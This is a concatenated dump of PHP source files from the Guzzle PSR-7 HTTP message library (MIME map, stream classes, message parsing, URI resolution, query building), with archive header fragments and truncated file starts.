'application/prs.cww', 'cxt' => 'application/x-director', 'cxx' => 'text/x-c', 'dae' => 'model/vnd.collada+xml', 'daf' => 'application/vnd.mobius.daf', 'dart' => 'application/vnd.dart', 'dataless' => 'application/vnd.fdsn.seed', 'davmount' => 'application/davmount+xml', 'dbf' => 'application/vnd.dbf', 'dbk' => 'application/docbook+xml', 'dcr' => 'application/x-director', 'dcurl' => 'text/vnd.curl.dcurl', 'dd2' => 'application/vnd.oma.dd2+xml', 'ddd' => 'application/vnd.fujixerox.ddd', 'ddf' => 'application/vnd.syncml.dmddf+xml', 'dds' => 'image/vnd.ms-dds', 'deb' => 'application/x-debian-package', 'def' => 'text/plain', 'deploy' => 'application/octet-stream', 'der' => 'application/x-x509-ca-cert', 'dfac' => 'application/vnd.dreamfactory', 'dgc' => 'application/x-dgc-compressed', 'dib' => 'image/bmp', 'dic' => 'text/x-c', 'dir' => 'application/x-director', 'dis' => 'application/vnd.mobius.dis', 'disposition-notification' => 'message/disposition-notification', 'dist' => 'application/octet-stream', 'distz' => 'application/octet-stream', 'djv' => 'image/vnd.djvu', 'djvu' => 'image/vnd.djvu', 'dll' => 'application/octet-stream', 'dmg' => 'application/x-apple-diskimage', 'dmn' => 'application/octet-stream', 'dmp' => 'application/vnd.tcpdump.pcap', 'dms' => 'application/octet-stream', 'dna' => 'application/vnd.dna', 'doc' => 'application/msword', 'docm' => 'application/vnd.ms-word.template.macroEnabled.12', 'docx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'dot' => 'application/msword', 'dotm' => 'application/vnd.ms-word.template.macroEnabled.12', 'dotx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.template', 'dp' => 'application/vnd.osgi.dp', 'dpg' => 'application/vnd.dpgraph', 'dpx' => 'image/dpx', 'dra' => 'audio/vnd.dra', 'drle' => 'image/dicom-rle', 'dsc' => 'text/prs.lines.tag', 'dssc' => 'application/dssc+der', 'dtb' => 'application/x-dtbook+xml', 'dtd' => 'application/xml-dtd', 'dts' => 'audio/vnd.dts', 'dtshd' => 'audio/vnd.dts.hd', 'dump' => 'application/octet-stream', 'dvb' => 'video/vnd.dvb.file', 'dvi' => 'application/x-dvi', 'dwd' => 'application/atsc-dwd+xml', 'dwf' => 'model/vnd.dwf', 'dwg' => 'image/vnd.dwg', 'dxf' => 'image/vnd.dxf', 'dxp' => 'application/vnd.spotfire.dxp', 'dxr' => 'application/x-director', 'ear' => 'application/java-archive', 'ecelp4800' => 'audio/vnd.nuera.ecelp4800', 'ecelp7470' => 'audio/vnd.nuera.ecelp7470', 'ecelp9600' => 'audio/vnd.nuera.ecelp9600', 'ecma' => 'application/ecmascript', 'edm' => 'application/vnd.novadigm.edm', 'edx' => 'application/vnd.novadigm.edx', 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'application/xv+xml', 'xwd' => 'image/x-xwindowdump', 'xyz' => 'chemical/x-xyz', 'xz' => 'application/x-xz', 'yaml' => 'text/yaml', 'yang' => 'application/yang', 'yin' => 'application/yin+xml', 'yml' => 'text/yaml', 'ymp' => 'text/x-suse-ymp', 'z' => 'application/x-compress', 'z1' => 'application/x-zmachine', 'z2' => 'application/x-zmachine', 'z3' => 'application/x-zmachine', 'z4' => 'application/x-zmachine', 'z5' => 'application/x-zmachine', 'z6' => 'application/x-zmachine', 'z7' => 'application/x-zmachine', 'z8' => 'application/x-zmachine', 'zaz' => 'application/vnd.zzazz.deck+xml', 'zip' => 'application/zip', 'zir' => 'application/vnd.zul', 'zirz' => 'application/vnd.zul', 'zmm' => 'application/vnd.handheld-entertainment+xml', 'zsh' => 'text/x-scriptzsh', ]; /** * Determines the mimetype of a file by looking at its extension. * * @see https://raw.githubusercontent.com/jshttp/mime-db/master/db.json */ public static function fromFilename(string $filename): ?string { return self::fromExtension(pathinfo($filename, PATHINFO_EXTENSION)); } /** * Maps a file extensions to a mimetype. * * @see https://raw.githubusercontent.com/jshttp/mime-db/master/db.json */ public static function fromExtension(string $extension): ?string { return self::MIME_TYPES[strtolower($extension)] ?? null; } } google-api/vendor/guzzlehttp/psr7/src/AppendStream.php000064400000013473147600400120017064 0ustar00addStream($stream); } } public function __toString(): string { try { $this->rewind(); return $this->getContents(); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } trigger_error(sprintf('%s::__toString exception: %s', self::class, (string) $e), E_USER_ERROR); return ''; } } /** * Add a stream to the AppendStream * * @param StreamInterface $stream Stream to append. Must be readable. * * @throws \InvalidArgumentException if the stream is not readable */ public function addStream(StreamInterface $stream): void { if (!$stream->isReadable()) { throw new \InvalidArgumentException('Each stream must be readable'); } // The stream is only seekable if all streams are seekable if (!$stream->isSeekable()) { $this->seekable = false; } $this->streams[] = $stream; } public function getContents(): string { return Utils::copyToString($this); } /** * Closes each attached stream. */ public function close(): void { $this->pos = $this->current = 0; $this->seekable = true; foreach ($this->streams as $stream) { $stream->close(); } $this->streams = []; } /** * Detaches each attached stream. * * Returns null as it's not clear which underlying stream resource to return. */ public function detach() { $this->pos = $this->current = 0; $this->seekable = true; foreach ($this->streams as $stream) { $stream->detach(); } $this->streams = []; return null; } public function tell(): int { return $this->pos; } /** * Tries to calculate the size by adding the size of each stream. * * If any of the streams do not return a valid number, then the size of the * append stream cannot be determined and null is returned. */ public function getSize(): ?int { $size = 0; foreach ($this->streams as $stream) { $s = $stream->getSize(); if ($s === null) { return null; } $size += $s; } return $size; } public function eof(): bool { return !$this->streams || ($this->current >= count($this->streams) - 1 && $this->streams[$this->current]->eof()); } public function rewind(): void { $this->seek(0); } /** * Attempts to seek to the given position. Only supports SEEK_SET. */ public function seek($offset, $whence = SEEK_SET): void { if (!$this->seekable) { throw new \RuntimeException('This AppendStream is not seekable'); } elseif ($whence !== SEEK_SET) { throw new \RuntimeException('The AppendStream can only seek with SEEK_SET'); } $this->pos = $this->current = 0; // Rewind each stream foreach ($this->streams as $i => $stream) { try { $stream->rewind(); } catch (\Exception $e) { throw new \RuntimeException('Unable to seek stream ' .$i.' of the AppendStream', 0, $e); } } // Seek to the actual position by reading from each stream while ($this->pos < $offset && !$this->eof()) { $result = $this->read(min(8096, $offset - $this->pos)); if ($result === '') { break; } } } /** * Reads from all of the appended streams until the length is met or EOF. */ public function read($length): string { $buffer = ''; $total = count($this->streams) - 1; $remaining = $length; $progressToNext = false; while ($remaining > 0) { // Progress to the next stream if needed. if ($progressToNext || $this->streams[$this->current]->eof()) { $progressToNext = false; if ($this->current === $total) { break; } ++$this->current; } $result = $this->streams[$this->current]->read($remaining); if ($result === '') { $progressToNext = true; continue; } $buffer .= $result; $remaining = $length - strlen($buffer); } $this->pos += strlen($buffer); return $buffer; } public function isReadable(): bool { return true; } public function isWritable(): bool { return false; } public function isSeekable(): bool { return $this->seekable; } public function write($string): int { throw new \RuntimeException('Cannot write to an AppendStream'); } /** * @return mixed */ public function getMetadata($key = null) { return $key ? null : []; } } google-api/vendor/guzzlehttp/psr7/src/LimitStream.php000064400000010311147600400120016717 0ustar00stream = $stream; $this->setLimit($limit); $this->setOffset($offset); } public function eof(): bool { // Always return true if the underlying stream is EOF if ($this->stream->eof()) { return true; } // No limit and the underlying stream is not at EOF if ($this->limit === -1) { return false; } return $this->stream->tell() >= $this->offset + $this->limit; } /** * Returns the size of the limited subset of data */ public function getSize(): ?int { if (null === ($length = $this->stream->getSize())) { return null; } elseif ($this->limit === -1) { return $length - $this->offset; } else { return min($this->limit, $length - $this->offset); } } /** * Allow for a bounded seek on the read limited stream */ public function seek($offset, $whence = SEEK_SET): void { if ($whence !== SEEK_SET || $offset < 0) { throw new \RuntimeException(sprintf( 'Cannot seek to offset %s with whence %s', $offset, $whence )); } $offset += $this->offset; if ($this->limit !== -1) { if ($offset > $this->offset + $this->limit) { $offset = $this->offset + $this->limit; } } $this->stream->seek($offset); } /** * Give a relative tell() */ public function tell(): int { return $this->stream->tell() - $this->offset; } /** * Set the offset to start limiting from * * @param int $offset Offset to seek to and begin byte limiting from * * @throws \RuntimeException if the stream cannot be seeked. */ public function setOffset(int $offset): void { $current = $this->stream->tell(); if ($current !== $offset) { // If the stream cannot seek to the offset position, then read to it if ($this->stream->isSeekable()) { $this->stream->seek($offset); } elseif ($current > $offset) { throw new \RuntimeException("Could not seek to stream offset $offset"); } else { $this->stream->read($offset - $current); } } $this->offset = $offset; } /** * Set the limit of bytes that the decorator allows to be read from the * stream. * * @param int $limit Number of bytes to allow to be read from the stream. * Use -1 for no limit. */ public function setLimit(int $limit): void { $this->limit = $limit; } public function read($length): string { if ($this->limit === -1) { return $this->stream->read($length); } // Check if the current position is less than the total allowed // bytes + original offset $remaining = ($this->offset + $this->limit) - $this->stream->tell(); if ($remaining > 0) { // Only return the amount of requested data, ensuring that the byte // limit is not exceeded return $this->stream->read(min($remaining, $length)); } return ''; } } google-api/vendor/guzzlehttp/psr7/src/MessageTrait.php000064400000017100147600400120017060 0ustar00 array of values */ private $headers = []; /** @var string[] Map of lowercase header name => original name at registration */ private $headerNames = []; /** @var string */ private $protocol = '1.1'; /** @var StreamInterface|null */ private $stream; public function getProtocolVersion(): string { return $this->protocol; } public function withProtocolVersion($version): MessageInterface { if ($this->protocol === $version) { return $this; } $new = clone $this; $new->protocol = $version; return $new; } public function getHeaders(): array { return $this->headers; } public function hasHeader($header): bool { return isset($this->headerNames[strtolower($header)]); } public function getHeader($header): array { $header = strtolower($header); if (!isset($this->headerNames[$header])) { return []; } $header = $this->headerNames[$header]; return $this->headers[$header]; } public function getHeaderLine($header): string { return implode(', ', $this->getHeader($header)); } public function withHeader($header, $value): MessageInterface { $this->assertHeader($header); $value = $this->normalizeHeaderValue($value); $normalized = strtolower($header); $new = clone $this; if (isset($new->headerNames[$normalized])) { unset($new->headers[$new->headerNames[$normalized]]); } $new->headerNames[$normalized] = $header; $new->headers[$header] = $value; return $new; } public function withAddedHeader($header, $value): MessageInterface { $this->assertHeader($header); $value = $this->normalizeHeaderValue($value); $normalized = strtolower($header); $new = clone $this; if (isset($new->headerNames[$normalized])) { $header = $this->headerNames[$normalized]; $new->headers[$header] = array_merge($this->headers[$header], $value); } else { $new->headerNames[$normalized] = $header; $new->headers[$header] = $value; } return $new; } public function withoutHeader($header): MessageInterface { $normalized = strtolower($header); if (!isset($this->headerNames[$normalized])) { return $this; } $header = $this->headerNames[$normalized]; $new = clone $this; unset($new->headers[$header], $new->headerNames[$normalized]); return $new; } public function getBody(): StreamInterface { if (!$this->stream) { $this->stream = Utils::streamFor(''); } return $this->stream; } public function withBody(StreamInterface $body): MessageInterface { if ($body === $this->stream) { return $this; } $new = clone $this; $new->stream = $body; return $new; } /** * @param (string|string[])[] $headers */ private function setHeaders(array $headers): void { $this->headerNames = $this->headers = []; foreach ($headers as $header => $value) { // Numeric array keys are converted to int by PHP. $header = (string) $header; $this->assertHeader($header); $value = $this->normalizeHeaderValue($value); $normalized = strtolower($header); if (isset($this->headerNames[$normalized])) { $header = $this->headerNames[$normalized]; $this->headers[$header] = array_merge($this->headers[$header], $value); } else { $this->headerNames[$normalized] = $header; $this->headers[$header] = $value; } } } /** * @param mixed $value * * @return string[] */ private function normalizeHeaderValue($value): array { if (!is_array($value)) { return $this->trimAndValidateHeaderValues([$value]); } if (count($value) === 0) { throw new \InvalidArgumentException('Header value can not be an empty array.'); } return $this->trimAndValidateHeaderValues($value); } /** * Trims whitespace from the header values. * * Spaces and tabs ought to be excluded by parsers when extracting the field value from a header field. * * header-field = field-name ":" OWS field-value OWS * OWS = *( SP / HTAB ) * * @param mixed[] $values Header values * * @return string[] Trimmed header values * * @see https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4 */ private function trimAndValidateHeaderValues(array $values): array { return array_map(function ($value) { if (!is_scalar($value) && null !== $value) { throw new \InvalidArgumentException(sprintf( 'Header value must be scalar or null but %s provided.', is_object($value) ? get_class($value) : gettype($value) )); } $trimmed = trim((string) $value, " \t"); $this->assertValue($trimmed); return $trimmed; }, array_values($values)); } /** * @see https://datatracker.ietf.org/doc/html/rfc7230#section-3.2 * * @param mixed $header */ private function assertHeader($header): void { if (!is_string($header)) { throw new \InvalidArgumentException(sprintf( 'Header name must be a string but %s provided.', is_object($header) ? get_class($header) : gettype($header) )); } if (!preg_match('/^[a-zA-Z0-9\'`#$%&*+.^_|~!-]+$/D', $header)) { throw new \InvalidArgumentException( sprintf('"%s" is not valid header name.', $header) ); } } /** * @see https://datatracker.ietf.org/doc/html/rfc7230#section-3.2 * * field-value = *( field-content / obs-fold ) * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] * field-vchar = VCHAR / obs-text * VCHAR = %x21-7E * obs-text = %x80-FF * obs-fold = CRLF 1*( SP / HTAB ) */ private function assertValue(string $value): void { // The regular expression intentionally does not support the obs-fold production, because as // per RFC 7230#3.2.4: // // A sender MUST NOT generate a message that includes // line folding (i.e., that has any field-value that contains a match to // the obs-fold rule) unless the message is intended for packaging // within the message/http media type. // // Clients must not send a request with line folding and a server sending folded headers is // likely very rare. Line folding is a fairly obscure feature of HTTP/1.1 and thus not accepting // folding is not likely to break any legitimate use case. if (!preg_match('/^[\x20\x09\x21-\x7E\x80-\xFF]*$/D', $value)) { throw new \InvalidArgumentException( sprintf('"%s" is not valid header value.', $value) ); } } } google-api/vendor/guzzlehttp/psr7/src/InflateStream.php000064400000002607147600400120017234 0ustar00 15 + 32]); $this->stream = $stream->isSeekable() ? new Stream($resource) : new NoSeekStream(new Stream($resource)); } } google-api/vendor/guzzlehttp/psr7/src/Message.php000064400000020217147600400120016057 0ustar00getMethod().' ' .$message->getRequestTarget()) .' HTTP/'.$message->getProtocolVersion(); if (!$message->hasHeader('host')) { $msg .= "\r\nHost: ".$message->getUri()->getHost(); } } elseif ($message instanceof ResponseInterface) { $msg = 'HTTP/'.$message->getProtocolVersion().' ' .$message->getStatusCode().' ' .$message->getReasonPhrase(); } else { throw new \InvalidArgumentException('Unknown message type'); } foreach ($message->getHeaders() as $name => $values) { if (is_string($name) && strtolower($name) === 'set-cookie') { foreach ($values as $value) { $msg .= "\r\n{$name}: ".$value; } } else { $msg .= "\r\n{$name}: ".implode(', ', $values); } } return "{$msg}\r\n\r\n".$message->getBody(); } /** * Get a short summary of the message body. * * Will return `null` if the response is not printable. * * @param MessageInterface $message The message to get the body summary * @param int $truncateAt The maximum allowed size of the summary */ public static function bodySummary(MessageInterface $message, int $truncateAt = 120): ?string { $body = $message->getBody(); if (!$body->isSeekable() || !$body->isReadable()) { return null; } $size = $body->getSize(); if ($size === 0) { return null; } $body->rewind(); $summary = $body->read($truncateAt); $body->rewind(); if ($size > $truncateAt) { $summary .= ' (truncated...)'; } // Matches any printable character, including unicode characters: // letters, marks, numbers, punctuation, spacing, and separators. if (preg_match('/[^\pL\pM\pN\pP\pS\pZ\n\r\t]/u', $summary) !== 0) { return null; } return $summary; } /** * Attempts to rewind a message body and throws an exception on failure. * * The body of the message will only be rewound if a call to `tell()` * returns a value other than `0`. * * @param MessageInterface $message Message to rewind * * @throws \RuntimeException */ public static function rewindBody(MessageInterface $message): void { $body = $message->getBody(); if ($body->tell()) { $body->rewind(); } } /** * Parses an HTTP message into an associative array. * * The array contains the "start-line" key containing the start line of * the message, "headers" key containing an associative array of header * array values, and a "body" key containing the body of the message. * * @param string $message HTTP request or response to parse. */ public static function parseMessage(string $message): array { if (!$message) { throw new \InvalidArgumentException('Invalid message'); } $message = ltrim($message, "\r\n"); $messageParts = preg_split("/\r?\n\r?\n/", $message, 2); if ($messageParts === false || count($messageParts) !== 2) { throw new \InvalidArgumentException('Invalid message: Missing header delimiter'); } [$rawHeaders, $body] = $messageParts; $rawHeaders .= "\r\n"; // Put back the delimiter we split previously $headerParts = preg_split("/\r?\n/", $rawHeaders, 2); if ($headerParts === false || count($headerParts) !== 2) { throw new \InvalidArgumentException('Invalid message: Missing status line'); } [$startLine, $rawHeaders] = $headerParts; if (preg_match("/(?:^HTTP\/|^[A-Z]+ \S+ HTTP\/)(\d+(?:\.\d+)?)/i", $startLine, $matches) && $matches[1] === '1.0') { // Header folding is deprecated for HTTP/1.1, but allowed in HTTP/1.0 $rawHeaders = preg_replace(Rfc7230::HEADER_FOLD_REGEX, ' ', $rawHeaders); } /** @var array[] $headerLines */ $count = preg_match_all(Rfc7230::HEADER_REGEX, $rawHeaders, $headerLines, PREG_SET_ORDER); // If these aren't the same, then one line didn't match and there's an invalid header. if ($count !== substr_count($rawHeaders, "\n")) { // Folding is deprecated, see https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4 if (preg_match(Rfc7230::HEADER_FOLD_REGEX, $rawHeaders)) { throw new \InvalidArgumentException('Invalid header syntax: Obsolete line folding'); } throw new \InvalidArgumentException('Invalid header syntax'); } $headers = []; foreach ($headerLines as $headerLine) { $headers[$headerLine[1]][] = $headerLine[2]; } return [ 'start-line' => $startLine, 'headers' => $headers, 'body' => $body, ]; } /** * Constructs a URI for an HTTP request message. * * @param string $path Path from the start-line * @param array $headers Array of headers (each value an array). */ public static function parseRequestUri(string $path, array $headers): string { $hostKey = array_filter(array_keys($headers), function ($k) { // Numeric array keys are converted to int by PHP. $k = (string) $k; return strtolower($k) === 'host'; }); // If no host is found, then a full URI cannot be constructed. if (!$hostKey) { return $path; } $host = $headers[reset($hostKey)][0]; $scheme = substr($host, -4) === ':443' ? 'https' : 'http'; return $scheme.'://'.$host.'/'.ltrim($path, '/'); } /** * Parses a request message string into a request object. * * @param string $message Request message string. */ public static function parseRequest(string $message): RequestInterface { $data = self::parseMessage($message); $matches = []; if (!preg_match('/^[\S]+\s+([a-zA-Z]+:\/\/|\/).*/', $data['start-line'], $matches)) { throw new \InvalidArgumentException('Invalid request string'); } $parts = explode(' ', $data['start-line'], 3); $version = isset($parts[2]) ? explode('/', $parts[2])[1] : '1.1'; $request = new Request( $parts[0], $matches[1] === '/' ? self::parseRequestUri($parts[1], $data['headers']) : $parts[1], $data['headers'], $data['body'], $version ); return $matches[1] === '/' ? $request : $request->withRequestTarget($parts[1]); } /** * Parses a response message string into a response object. * * @param string $message Response message string. */ public static function parseResponse(string $message): ResponseInterface { $data = self::parseMessage($message); // According to https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2 // the space between status-code and reason-phrase is required. But // browsers accept responses without space and reason as well. if (!preg_match('/^HTTP\/.* [0-9]{3}( .*|$)/', $data['start-line'])) { throw new \InvalidArgumentException('Invalid response string: '.$data['start-line']); } $parts = explode(' ', $data['start-line'], 3); return new Response( (int) $parts[1], $data['headers'], $data['body'], explode('/', $parts[0])[1], $parts[2] ?? null ); } } google-api/vendor/guzzlehttp/psr7/src/DroppingStream.php000064400000002254147600400120017432 0ustar00stream = $stream; $this->maxLength = $maxLength; } public function write($string): int { $diff = $this->maxLength - $this->stream->getSize(); // Begin returning 0 when the underlying stream is too large. if ($diff <= 0) { return 0; } // Write the stream or a subset of the stream if needed. if (strlen($string) < $diff) { return $this->stream->write($string); } return $this->stream->write(substr($string, 0, $diff)); } } google-api/vendor/guzzlehttp/psr7/src/UriResolver.php000064400000020603147600400120016753 0ustar00getScheme() != '') { return $rel->withPath(self::removeDotSegments($rel->getPath())); } if ($rel->getAuthority() != '') { $targetAuthority = $rel->getAuthority(); $targetPath = self::removeDotSegments($rel->getPath()); $targetQuery = $rel->getQuery(); } else { $targetAuthority = $base->getAuthority(); if ($rel->getPath() === '') { $targetPath = $base->getPath(); $targetQuery = $rel->getQuery() != '' ? $rel->getQuery() : $base->getQuery(); } else { if ($rel->getPath()[0] === '/') { $targetPath = $rel->getPath(); } else { if ($targetAuthority != '' && $base->getPath() === '') { $targetPath = '/'.$rel->getPath(); } else { $lastSlashPos = strrpos($base->getPath(), '/'); if ($lastSlashPos === false) { $targetPath = $rel->getPath(); } else { $targetPath = substr($base->getPath(), 0, $lastSlashPos + 1).$rel->getPath(); } } } $targetPath = self::removeDotSegments($targetPath); $targetQuery = $rel->getQuery(); } } return new Uri(Uri::composeComponents( $base->getScheme(), $targetAuthority, $targetPath, $targetQuery, $rel->getFragment() )); } /** * Returns the target URI as a relative reference from the base URI. * * This method is the counterpart to resolve(): * * (string) $target === (string) UriResolver::resolve($base, UriResolver::relativize($base, $target)) * * One use-case is to use the current request URI as base URI and then generate relative links in your documents * to reduce the document size or offer self-contained downloadable document archives. * * $base = new Uri('http://example.com/a/b/'); * echo UriResolver::relativize($base, new Uri('http://example.com/a/b/c')); // prints 'c'. * echo UriResolver::relativize($base, new Uri('http://example.com/a/x/y')); // prints '../x/y'. * echo UriResolver::relativize($base, new Uri('http://example.com/a/b/?q')); // prints '?q'. * echo UriResolver::relativize($base, new Uri('http://example.org/a/b/')); // prints '//example.org/a/b/'. * * This method also accepts a target that is already relative and will try to relativize it further. Only a * relative-path reference will be returned as-is. * * echo UriResolver::relativize($base, new Uri('/a/b/c')); // prints 'c' as well */ public static function relativize(UriInterface $base, UriInterface $target): UriInterface { if ($target->getScheme() !== '' && ($base->getScheme() !== $target->getScheme() || $target->getAuthority() === '' && $base->getAuthority() !== '') ) { return $target; } if (Uri::isRelativePathReference($target)) { // As the target is already highly relative we return it as-is. It would be possible to resolve // the target with `$target = self::resolve($base, $target);` and then try make it more relative // by removing a duplicate query. But let's not do that automatically. return $target; } if ($target->getAuthority() !== '' && $base->getAuthority() !== $target->getAuthority()) { return $target->withScheme(''); } // We must remove the path before removing the authority because if the path starts with two slashes, the URI // would turn invalid. And we also cannot set a relative path before removing the authority, as that is also // invalid. $emptyPathUri = $target->withScheme('')->withPath('')->withUserInfo('')->withPort(null)->withHost(''); if ($base->getPath() !== $target->getPath()) { return $emptyPathUri->withPath(self::getRelativePath($base, $target)); } if ($base->getQuery() === $target->getQuery()) { // Only the target fragment is left. And it must be returned even if base and target fragment are the same. return $emptyPathUri->withQuery(''); } // If the base URI has a query but the target has none, we cannot return an empty path reference as it would // inherit the base query component when resolving. if ($target->getQuery() === '') { $segments = explode('/', $target->getPath()); /** @var string $lastSegment */ $lastSegment = end($segments); return $emptyPathUri->withPath($lastSegment === '' ? './' : $lastSegment); } return $emptyPathUri; } private static function getRelativePath(UriInterface $base, UriInterface $target): string { $sourceSegments = explode('/', $base->getPath()); $targetSegments = explode('/', $target->getPath()); array_pop($sourceSegments); $targetLastSegment = array_pop($targetSegments); foreach ($sourceSegments as $i => $segment) { if (isset($targetSegments[$i]) && $segment === $targetSegments[$i]) { unset($sourceSegments[$i], $targetSegments[$i]); } else { break; } } $targetSegments[] = $targetLastSegment; $relativePath = str_repeat('../', count($sourceSegments)).implode('/', $targetSegments); // A reference to am empty last segment or an empty first sub-segment must be prefixed with "./". // This also applies to a segment with a colon character (e.g., "file:colon") that cannot be used // as the first segment of a relative-path reference, as it would be mistaken for a scheme name. if ('' === $relativePath || false !== strpos(explode('/', $relativePath, 2)[0], ':')) { $relativePath = "./$relativePath"; } elseif ('/' === $relativePath[0]) { if ($base->getAuthority() != '' && $base->getPath() === '') { // In this case an extra slash is added by resolve() automatically. So we must not add one here. $relativePath = ".$relativePath"; } else { $relativePath = "./$relativePath"; } } return $relativePath; } private function __construct() { // cannot be instantiated } } google-api/vendor/guzzlehttp/psr7/src/StreamWrapper.php000064400000010713147600400120017267 0ustar00isReadable()) { $mode = $stream->isWritable() ? 'r+' : 'r'; } elseif ($stream->isWritable()) { $mode = 'w'; } else { throw new \InvalidArgumentException('The stream must be readable, ' .'writable, or both.'); } return fopen('guzzle://stream', $mode, false, self::createStreamContext($stream)); } /** * Creates a stream context that can be used to open a stream as a php stream resource. * * @return resource */ public static function createStreamContext(StreamInterface $stream) { return stream_context_create([ 'guzzle' => ['stream' => $stream], ]); } /** * Registers the stream wrapper if needed */ public static function register(): void { if (!in_array('guzzle', stream_get_wrappers())) { stream_wrapper_register('guzzle', __CLASS__); } } public function stream_open(string $path, string $mode, int $options, string &$opened_path = null): bool { $options = stream_context_get_options($this->context); if (!isset($options['guzzle']['stream'])) { return false; } $this->mode = $mode; $this->stream = $options['guzzle']['stream']; return true; } public function stream_read(int $count): string { return $this->stream->read($count); } public function stream_write(string $data): int { return $this->stream->write($data); } public function stream_tell(): int { return $this->stream->tell(); } public function stream_eof(): bool { return $this->stream->eof(); } public function stream_seek(int $offset, int $whence): bool { $this->stream->seek($offset, $whence); return true; } /** * @return resource|false */ public function stream_cast(int $cast_as) { $stream = clone $this->stream; $resource = $stream->detach(); return $resource ?? false; } /** * @return array{ * dev: int, * ino: int, * mode: int, * nlink: int, * uid: int, * gid: int, * rdev: int, * size: int, * atime: int, * mtime: int, * ctime: int, * blksize: int, * blocks: int * } */ public function stream_stat(): array { static $modeMap = [ 'r' => 33060, 'rb' => 33060, 'r+' => 33206, 'w' => 33188, 'wb' => 33188, ]; return [ 'dev' => 0, 'ino' => 0, 'mode' => $modeMap[$this->mode], 'nlink' => 0, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => $this->stream->getSize() ?: 0, 'atime' => 0, 'mtime' => 0, 'ctime' => 0, 'blksize' => 0, 'blocks' => 0, ]; } /** * @return array{ * dev: int, * ino: int, * mode: int, * nlink: int, * uid: int, * gid: int, * rdev: int, * size: int, * atime: int, * mtime: int, * ctime: int, * blksize: int, * blocks: int * } */ public function url_stat(string $path, int $flags): array { return [ 'dev' => 0, 'ino' => 0, 'mode' => 0, 'nlink' => 0, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 0, 'atime' => 0, 'mtime' => 0, 'ctime' => 0, 'blksize' => 0, 'blocks' => 0, ]; } } google-api/vendor/guzzlehttp/psr7/src/Query.php000064400000007077147600400120015611 0ustar00 '1', 'foo[b]' => '2'])`. * * @param string $str Query string to parse * @param int|bool $urlEncoding How the query string is encoded */ public static function parse(string $str, $urlEncoding = true): array { $result = []; if ($str === '') { return $result; } if ($urlEncoding === true) { $decoder = function ($value) { return rawurldecode(str_replace('+', ' ', (string) $value)); }; } elseif ($urlEncoding === PHP_QUERY_RFC3986) { $decoder = 'rawurldecode'; } elseif ($urlEncoding === PHP_QUERY_RFC1738) { $decoder = 'urldecode'; } else { $decoder = function ($str) { return $str; }; } foreach (explode('&', $str) as $kvp) { $parts = explode('=', $kvp, 2); $key = $decoder($parts[0]); $value = isset($parts[1]) ? $decoder($parts[1]) : null; if (!array_key_exists($key, $result)) { $result[$key] = $value; } else { if (!is_array($result[$key])) { $result[$key] = [$result[$key]]; } $result[$key][] = $value; } } return $result; } /** * Build a query string from an array of key value pairs. * * This function can use the return value of `parse()` to build a query * string. This function does not modify the provided keys when an array is * encountered (like `http_build_query()` would). * * @param array $params Query string parameters. * @param int|false $encoding Set to false to not encode, PHP_QUERY_RFC3986 * to encode using RFC3986, or PHP_QUERY_RFC1738 * to encode using RFC1738. */ public static function build(array $params, $encoding = PHP_QUERY_RFC3986): string { if (!$params) { return ''; } if ($encoding === false) { $encoder = function (string $str): string { return $str; }; } elseif ($encoding === PHP_QUERY_RFC3986) { $encoder = 'rawurlencode'; } elseif ($encoding === PHP_QUERY_RFC1738) { $encoder = 'urlencode'; } else { throw new \InvalidArgumentException('Invalid type'); } $qs = ''; foreach ($params as $k => $v) { $k = $encoder((string) $k); if (!is_array($v)) { $qs .= $k; $v = is_bool($v) ? (int) $v : $v; if ($v !== null) { $qs .= '='.$encoder((string) $v); } $qs .= '&'; } else { foreach ($v as $vv) { $qs .= $k; $vv = is_bool($vv) ? (int) $vv : $vv; if ($vv !== null) { $qs .= '='.$encoder((string) $vv); } $qs .= '&'; } } } return $qs ? (string) substr($qs, 0, -1) : ''; } } google-api/vendor/guzzlehttp/psr7/src/BufferStream.php000064400000006220147600400120017056 0ustar00hwm = $hwm; } public function __toString(): string { return $this->getContents(); } public function getContents(): string { $buffer = $this->buffer; $this->buffer = ''; return $buffer; } public function close(): void { $this->buffer = ''; } public function detach() { $this->close(); return null; } public function getSize(): ?int { return strlen($this->buffer); } public function isReadable(): bool { return true; } public function isWritable(): bool { return true; } public function isSeekable(): bool { return false; } public function rewind(): void { $this->seek(0); } public function seek($offset, $whence = SEEK_SET): void { throw new \RuntimeException('Cannot seek a BufferStream'); } public function eof(): bool { return strlen($this->buffer) === 0; } public function tell(): int { throw new \RuntimeException('Cannot determine the position of a BufferStream'); } /** * Reads data from the buffer. */ public function read($length): string { $currentLength = strlen($this->buffer); if ($length >= $currentLength) { // No need to slice the buffer because we don't have enough data. $result = $this->buffer; $this->buffer = ''; } else { // Slice up the result to provide a subset of the buffer. $result = substr($this->buffer, 0, $length); $this->buffer = substr($this->buffer, $length); } return $result; } /** * Writes data to the buffer. */ public function write($string): int { $this->buffer .= $string; if (strlen($this->buffer) >= $this->hwm) { return 0; } return strlen($string); } /** * @return mixed */ public function getMetadata($key = null) { if ($key === 'hwm') { return $this->hwm; } return $key ? null : []; } } google-api/vendor/guzzlehttp/psr7/src/ServerRequest.php000064400000022515147600400120017315 0ustar00serverParams = $serverParams; parent::__construct($method, $uri, $headers, $body, $version); } /** * Return an UploadedFile instance array. * * @param array $files An array which respect $_FILES structure * * @throws InvalidArgumentException for unrecognized values */ public static function normalizeFiles(array $files): array { $normalized = []; foreach ($files as $key => $value) { if ($value instanceof UploadedFileInterface) { $normalized[$key] = $value; } elseif (is_array($value) && isset($value['tmp_name'])) { $normalized[$key] = self::createUploadedFileFromSpec($value); } elseif (is_array($value)) { $normalized[$key] = self::normalizeFiles($value); continue; } else { throw new InvalidArgumentException('Invalid value in files specification'); } } return $normalized; } /** * Create and return an UploadedFile instance from a $_FILES specification. * * If the specification represents an array of values, this method will * delegate to normalizeNestedFileSpec() and return that return value. * * @param array $value $_FILES struct * * @return UploadedFileInterface|UploadedFileInterface[] */ private static function createUploadedFileFromSpec(array $value) { if (is_array($value['tmp_name'])) { return self::normalizeNestedFileSpec($value); } return new UploadedFile( $value['tmp_name'], (int) $value['size'], (int) 